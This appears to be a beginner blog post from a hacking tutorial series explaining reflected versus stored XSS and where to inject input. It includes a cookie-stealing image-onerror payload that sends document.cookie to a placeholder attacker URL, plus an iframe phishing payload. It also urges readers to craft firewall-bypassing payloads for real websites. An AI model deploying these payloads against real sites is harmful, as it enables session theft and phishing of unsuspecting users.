Till now we have covered soo many things if you haven't checked other parts I suggest you go with them first then read this one, from this blog I will try to go much deeper for XSS but before that let's understand the major difference in both reflected XSS and stored XSS then some cookie-related things.

Reflected XSS vs Stored XSS


  • The first and most basic difference if you search something on a website with search box your query will be sent to the server and give you the result but will not be stored in the server then it's reflected XSS.
  •  But if you enter anything and it's saved inside the server or it's database then it becomes a stored XSS as the name suggest. 



  • Reflected XSS will not be seen to other users because your  payload is not saved inside the server and it will not be executed inside someone else browser unless and until you send the victim a link with payload included a basic example for this is if you search anything on any website with search box result will be shown to you only. it doesn't happen that on amazon you search for shoes and the result is shown in someone else mobile/PC.
  • on the other hand, stored XSS save your payload inside the server then if someone visits the same page from where you have tried to execute your payload it will be executed on other browsers too. a basic example, try to comment anything on this blog and visit this same part 6 blog after some time you will see that your comment is loaded every time you visit the same page if you execute your payload successfully here then everyone who visits this page will see your payload.


1. To find the Xss you will need to find a place where you can enter your string like search box, comment options, login, user registration, Http Headers or any other form which allow you to enter anything.

2. Now try to find if your string will be saved inside the server or not like if it's a search box then it's obvious it will not be saved inside the server but if it's login or comment option then it will be saved inside the server.

Note: the payload for both the XSS can be the same, but you have to find how you can create your payload to bypass firewalls and other backed systems because payload on google or we are using won't work on real-world websites they are created by other people, just try to find a way and figure out how to do that. it's not like that you will google it or ask me which payload will work here that's not possible if it was possible then no website would be secure.

Malicious XSS Payload 

To steal user cookie 
<img src=x onerror=this.src='http://yourwebsite/?c='+document.cookie>

if an attacker executes this payload inside the comment box and send or as a URL and send it to the victim if the victim visits the URL or page depending on the type of XSS (Reflted or Stored) then user cookie will be sent to the attacker website defined in the payload. for that this payload should be executed

Phishing
<iframe src="google.com">/iframe> 
If the attacker is able to execute the payload then he can cover the original website with the fake one. like this, if attacker is able to execute this payload somewhere in facebook like a search box and send the link to the victim and when the victim clicks on the link he will see a fake website with original facebook URL. 

You can join our telegram channel for free ebooks and other updates. You can follow us on Twitter and Instagram.
Share it If you like it